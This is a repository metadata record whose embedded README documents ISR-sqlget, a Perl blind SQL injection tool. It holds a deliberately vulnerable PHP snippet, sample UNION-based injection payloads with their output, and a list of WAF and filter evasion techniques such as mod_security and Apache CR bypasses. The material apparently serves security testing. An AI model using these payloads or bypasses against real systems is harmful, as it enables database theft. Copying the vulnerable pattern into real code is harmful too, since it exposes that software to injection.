{"id":19236425,"url":"https://github.com/infobyte/isr-sqlget","last_synced_at":"2025-04-21T05:32:23.580Z","repository":{"id":69537956,"uuid":"9700503","full_name":"infobyte/isr-sqlget","owner":"infobyte","description":"ISR-sqlget It's a blind SQL injection tool developed in Perl.","archived":false,"fork":false,"pushed_at":"2013-04-26T17:31:43.000Z","size":492,"stargazers_count":14,"open_issues_count":0,"forks_count":16,"subscribers_count":8,"default_branch":"master","last_synced_at":"2025-04-01T10:11:13.323Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Perl","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/infobyte.png","metadata":{"files":{"readme":"README","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2013-04-26T17:24:28.000Z","updated_at":"2024-02-09T00:02:54.000Z","dependencies_parsed_at":"2023-02-21T04:45:36.586Z","dependency_job_id":null,"html_url":"https://github.com/infobyte/isr-sqlget","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fisr-sqlget","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fisr-sqlget/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fisr-sqlget/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fisr-sqlget/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/infobyte","download_url":"https://codeload.github.com/infobyte/isr-sqlget/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250002291,"owners_count":21359086,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-09T16:20:34.173Z","updated_at":"2025-04-21T05:32:23.258Z","avatar_url":"https://github.com/infobyte.png","language":"Perl","funding_links":[],"categories":[],"sub_categories":[],"readme":"-- ISR - Infobyte Security Research\n-- | ISR-sqlget | www.infobytesec.com |\n\n\n..:: DESCRIPTION\n\nISR-sqlget: It's a blind SQL injection tool developed in Perl.\nIt lets you get databases schemas and tables rows.\nUsing a single GET/POST you can access quietly the database structure \nand using a single GET/POST you can dump every table row to a csv-like file.\n\nDatabases supported:\n\n - IBM DB2\n - Microsoft SQL Server\n - Oracle\n - Postgres\n - Mysql\n - IBM Informix\n - Sybase\n - Hsqldb (www.hsqldb.org)\n - Mimer (www.mimer.com)\n - Pervasive (www.pervasive.com)\n - Virtuoso (virtuoso.openlinksw.com)\n - SQLite\n - Interbase/Yaffil/Firebird (Borland)\n - H2 (http://www.h2database.com)\n - Mckoi (http://mckoi.com/database/)\n - Ingres (http://www.ingres.com)\n - MonetDB (http://www.monetdb.nl)\n - MaxDB (www.mysql.com/products/maxdb/)\n - ThinkSQL (http://www.thinksql.co.uk/) \n - SQLBase (http://www.unify.com)\n\nEvasion features:\n\n - Full-width/Half-width Unicode encoding\n - Apache non standard CR bypass\n - mod_security bypass\n - Random uppercase request transform\n - PHP Magicquotes: encode every string using db CHR function or similar.\n - Convert requests to hexadecimal values\n - Avoid non-space replacing for /**/ or (\\t) tab \n - Avoid non || or + concatenation using db concat function or similar.\n - Random user-agent\n - Random proxy-server\n - Random delay request\n\nCommon features:\n\n - Database schemate download blacklist\n - Cookie array support\n - SSL support\n - Proxy server support\n - Database information dumped in csv format\n\nReporting:\n\n - Database structure graphication to create impact executive reports\n require Graphviz library (http://www.graphviz.org/)\n\n..:: USE\n\nThe tool need the following information:\n- \u003cACTION\u003e : Action to do?\n- \u003cSESSION\u003e : Where?\n\nThe possible ACTIONs are:\n\n First:\n\t1. Get the database schema.\n\n Then:\n\t2.a Get the tables rows(csv format).\n\t2.b Get graphic database schema.\n\n..::Example: \n\nTarget:\nhttp://target.infobytesec.com/helloworld.php?id=\u003cSQL-INJECT\u003e\n\nhelloworld.php source:\n\u003c?\n$id = $_REQUEST['id'];\n\n$sql= 'select name from clients where id='.$id;\nexec_sql($sql);\n\n print \"Results\";\n print \"\u003ctable\u003e\";\n while ($tr = $database-\u003efetch_row()) {\n print \"\u003ctr\u003e\u003ctd\u003e\";\n print $tr['name'];\n print \"\u003c/td\u003e\u003c/tr\u003e\";\n }\n print \"\u003c/table\u003e\";\n?\u003e\n\nRead the session example (config file):\n./helloworld.pm\n\nGet the database schema:\n\n; bash# ./ISR-sqlget.pl -s -n helloworld\n; --------------------------------------------------\n; Action: Get dbschema, Session name: helloworld\n; --------------------------------------------------\n; \n; http://target.infobytesec.com/helloworld.php?id=,id=1 union select 1,COALESCE((select nspname from pg_namespace \n; where a.relnamespace =pg_namespace.oid),'0'::text)||'[__]'||COALESCE(relname,'0'::text)||'[__]'||COALESCE(attname,'0'::text);\n; ||'[__]'||COALESCE((select typname from pg_type where oid=b.atttypid),'0'::text) from (pg_attribute b JOIN pg_class a ON \n; (a.oid = b.attrelid)) where (attnum \u003e 0 and ((a.relkind = 'r'::\"char\") OR (a.relkind = 's'::\"char\"))) --'\n; from sqlite_master where type='table' --,GET\n; \n; bash#\n \nThis generate a local schema file in:\n./template/helloworld.dbschema\n\nThen get the tables rows:\n\n; bash# ./ISR-sqlget.pl -d -n helloworld\n;--------------------------------------------------\n;Action: Get DBDATA, Session name: helloworld\n;--------------------------------------------------\n;--------------------------------------------------\n;Action: Get DBDATA, Session name: helloworld, DbSchema: helloworld.dbschema\n;--------------------------------------------------\n;------------------------------------------------------------------------------------------------------------------------------------------------------\n;http://target.infobyte.com.ar/helloworld.php?id=,id=1 union all select id||'[__]'||name||'[__]'||address from\n;company.clients --,GET\n;Save source table: ./datos/helloworld.company.clients.sql.html\n;Save csv table: ./datos/helloworld.company.clients.csv\n;------------------------------------------------------------------------------------------------------------------------------\n;.....\n\nIn the directory \"./datos/\" you will have two files per table as the following: \n\n[sessionname].[database].[table].sql.html # html source\n[sessionname].[database].[table].csv \t # commad separated values\n\nNote that \"./datos\" can be specified with the parameter $conf::outputdb in the session\nconfig file.\n\n..:: Advanced\n\nThe tool uses only one column type text/varchar/etc in SELECT sql consult.\nUsing UNION setences you can get \"in that column\" all the database schema using \"[__]\" as delimiter.\n\nWhen you have already saved the local database schema, you will be able to:\n\n1.a Get the tables rows:\n Using the same technique you can get the all the rows of every table in the database,\n the datatypes columns that are not compatible with text are transform into datatype text\n using own database functions.\n\n1.b Get database schema graphic.\n\nThe tool uses for each action a session config file.\nThis config file defines the necesary parameters to exploit the sqlinjection.\nThe parameter @conf::path specifies the way that raw html is parsed to work with the tool.\n\nHelp details:\n\n Usage: ./ISR-sqlget.pl [ACTION] [OPTIONS]\n\nAction:\n -c: Check parser module\n -t: Get test page\n -a: Get all database names (only mssql)\n -s: Get database/s structure/s\n -d: Get database/s information/s (csv format)\n -g: Graphic structure of database (gif format)\n\t\t\t\n\t\t\t\nOptions:\n -n: Session name\n -p: (Use with -c action, specify src page to check the module);\n\tDefault ./template/$SESSION.testpage\n -v: Verbose\n -h: Help\n\n\n-t: Using the session file you get a short data system table to be used\n with the action \"-c\" to parse the raw html later.\n\n-c: By default use ./template/[session-name].testpage. It is used to develope and test\n the raw html parser.\n You can choose other html file using the \"-p\" option.\n \n-a: All DB engines do use the following order to get the tables rows:\n 1. \"-s\" get structure (It saves the database schema in a local file).\n 2. \"-d\" get tables data.\n \n Because of MSSQL system tables we have to add a previous step:\n 1. \"-a\" Get all database names of /schema/catalog (It saves the names in a local file).\n 2. \"-s\" get structure (It saves the database schema in a local file).\n 3. \"-d\" get tables data.\n\n-s: get structure (It saves the database schema in a local file). \n-d: get tables data.\n\n-g: Using the local database schema file previously obtained to \n get database graphic schema (gif format)\n \n-n: It specifies the name of session config file.\n \n..:: Notes\n\n./pmschanges.txt: We use modificated version of LWP, Net::HTTP that includes methods and CRLs specifications\n\t\t This file explains the modifications.\n\t\t \n./dbs/isr_*: Every database module has the @space variable that specifies the type of valid space.\n\t Example:\n\t\tmy @space=(' ',\"\\t\",\"/**/\"); #all spaces\n\n..:: Session file options:\n\n@conf::path #The parameter @conf::path specifies the way that raw html is parsed to work with the tool.\n\t #It uses embedded perl code with HTML::TreeBuilder to parse the raw html\n\t #The first configuration is a tree array with the html tags names needed. \n\t The last html tag name is processed with the perl code.\n\nSee examples in ./examples/\nexample[n].html\nsession[n].pm\n\n$conf::site \t#Site where the vulnerable app is\n\n$conf::script \t#Script file vulnerable\n\n$conf::method \t#Method 'POST', 'GET', 'HELLO', '\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n' (apache method bypass)\n\n$conf::inj \t#POST/GET parameters with the UNION senteces\n\t\t#It uses variables that later will be replace with the dynamic information.\n\n Variables:\n \u003cVALUE\u003e = Column used to get all the information.\n \u003cTABLE\u003e = Tables section.\n \u003cWHERE\u003e = Where section.\n \u003cTAIL\u003e = The last part of the sql sentence.\n\n Example: \"id=1') union select \u003cVALUE\u003e,'a' from \u003cTABLE\u003e \u003cWHERE\u003e \u003cTAIL\u003e --\";\n\n$conf::where \t#If you need to add some exception in the union table you have to use this\n\t\t#parameter because there are some database structure queries that have \"WHERE\" included\n\t\t\n$conf::tail \t#The last part of the sql sentence.\n$conf::param \t#Parameter style = Post style 1, Url style 0\n Post style=\n ;root@isr-slackware:~/dev# telnet localhost 80\n ;Trying 127.0.0.1...\n ;Connected to localhost.\n ;Escape character is '^]'.\n ;GET http://site/aaa.php HTTP/1.0\n ;id=aaa\n\n Url style:\n ;root@isr-slackware:~/dev# telnet localhost 80\n ;Trying 127.0.0.1...\n ;Connected to localhost.\n ;Escape character is '^]'.\n ;GET http://site/aaa.php?id=aaa HTTP/1.0\n\n$conf::dbtype #Database backend\n\n 1 - Oracle\n 2 - Microsoft SQL Server\n 3 - Mysql \n 4 - Postgres\n 5 - IBM DB2\n 6 - Interbase/Yaffil/Firebird (Borland) \n 7 - Mimer (www.mimer.com) \n 8 - Virtuoso (virtuoso.openlinksw.com)\n 9 - Pervasive (www.pervasive.com) \n 10 - Hsqldb (www.hsqldb.org) \n 11 - SQLite \n 12 - IBM Informix\n 13 - Sybase\n 14 - H2 (http://www.h2database.com)\n 15 - Mckoi (http://mckoi.com/database/)\n 16 - Ingres (http://www.ingres.com)\n 17 - MonetDB (http://www.monetdb.nl)\n 18 - MaxDB (www.mysql.com/products/maxdb/)\n 19 - ThinkSQL (http://www.thinksql.co.uk/) \n 20 - SQLBase (http://www.unify.com)\n\n$conf::session #Session name (You have to use the same name of the session config file without .pm extension)\n$conf::outputdb #The path of the dumped tables rows\n\n######### proxy\n$conf::proxy_host #Proxy support example: 'http://user:pass@host:port/'; \n$conf::rproxy #Random proxy 1 enable or 0 disable\n$conf::rproxyfile #Proxy random file (Use the same format than $conf::proxy_host)\n\n######### filters\n$conf::space #Space avoid: 0 enable space or 1 replace space ' ' with tab '\\t or \n\t\t #2 replace space ' ' with comment '/**/'\n\n\n$conf::apache_espace #You can specify the CRs value in the HTTP/s request\n\n#Example:\n# Valid apache CRs (\\x0b, \\x0c, \\x0d,)\n# $conf::apache_espace=\"\\x0b,\\x0c\"; #init=\\x0b and end=\\x0c\n# Process GET/POST/XXX HTTP request as \"GET\\x0b/script.php\\x0cHTTP/1.0\"\n\n$conf::apache_espace_rnd=1; #random combination of CRs 0x0b, 0x0c, 0x0d\n$conf::apache_espace_rmaxn=10; #Max random number of characters\n#In this example, we randomize the CRs (0x0b, 0x0c, 0x0d) from 1 to 10:\n#Reference: http://www.osvdb.org/25837\n\n$conf::mod_security \t#1 enable bypass modsecurity \u003c= 2.1.0 \u0026 (=\u003ePHP 5.2.0||PERL||Python)\n#Reference: http://www.php-security.org/MOPB/BONUS-12-2007.html\n\n$conf::full_width \t#1 enable bypass full-width encoding\n$conf::ruseragent \t#1 enable use random user agent\n$conf::ruseragentfile \t#User agent file list\n$conf::uagent \t\t#Default user agent\n$conf::delay \t\t#Delay between connection\n$conf::rdelay \t\t#1 enable random maximum delay between connections, use the $conf:delay as max value.\n$conf::magicquotes \t#1 enable avoid magicquotes (use CHR function o simil in each database)\n$conf::convertall_hex \t#1 transform every parameter value in hex format (%41,%61)\n$conf::rnd_uppercase \t#1 enable uppercase random transform.\n\n######## filters only mssql\n$conf::scape_plas \t\t#1 enable, Use CONCAT function in case of the script can't receive '+' \n\t\t\t\t#(used as string concatenation)\n$conf::convertall_str \t\t#1 enable convert all columns to string (recommed)\n$conf::scape_output_less \t#1 enable In case the script can't send '|' use database function to be replaced\n\n######## filters only oracle/db2/virtuoso/h2/mckoi/ingres/monetdb/maxdb/thinksql\n$conf::scape_pipe #Use CONCAT function or simil in case the script can't receive '|' (used as string concatenation)\n\n###### deny hash retrieve\n$conf::deny_dbname #array that have the database name not to be processed (blacklist)\nExample value = {'WMSYS' =\u003e 1,\n\t 'SYS' =\u003e 1\n };\n\n#Cookie\n$conf::cookie #1 enable cookie arraying\n@conf::cookies #array with the cookies to use\nExample value = ( {\n version=\u003eundef,\n key=\u003e'valu1',\n val=\u003e'password',\n path=\u003e'',\n domain=\u003e'',\n port=\u003eundef,\n path_spec=\u003eundef,\n secure=\u003eundef,\n maxage=\u003eundef,\n discard=\u003eundef,\n rest=\u003eundef\n });\n\n#Graphic options (More see GraphViz perl module help)\n$conf::graphdir = './graph/'; #The destination directory of graphics files\n$conf::glayout = 'dot';\n$conf::grootcolor='crimson';\n$conf::gdbcolor='darkgreen';\n$conf::gtablecolor='olivedrab1';\n$conf::gcolumncolor='lightblue2';\n$conf::gcolumn=0; #0= don't graph column 1= graph columns\n\t\t\t\t\t\t\n..:: REQUIREMENTS\n\n1 - Perl Modules:\n LWP::UserAgent\n HTTP::Cookies;\n Convert::EastAsianWidth\n Data::Dump\n GraphViz \n \n\n\n2 - Libs\n GraphViz project (http://www.graphviz.org/)\n\n..:: DOWNLOAD\n\nhttp://www.infobytesec.com/development.html\n\n..:: AUTHOR\nFrancisco Amato\nfamato+at+infobytesec+dot+com\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Finfobyte%2Fisr-sqlget","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Finfobyte%2Fisr-sqlget","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Finfobyte%2Fisr-sqlget/lists"}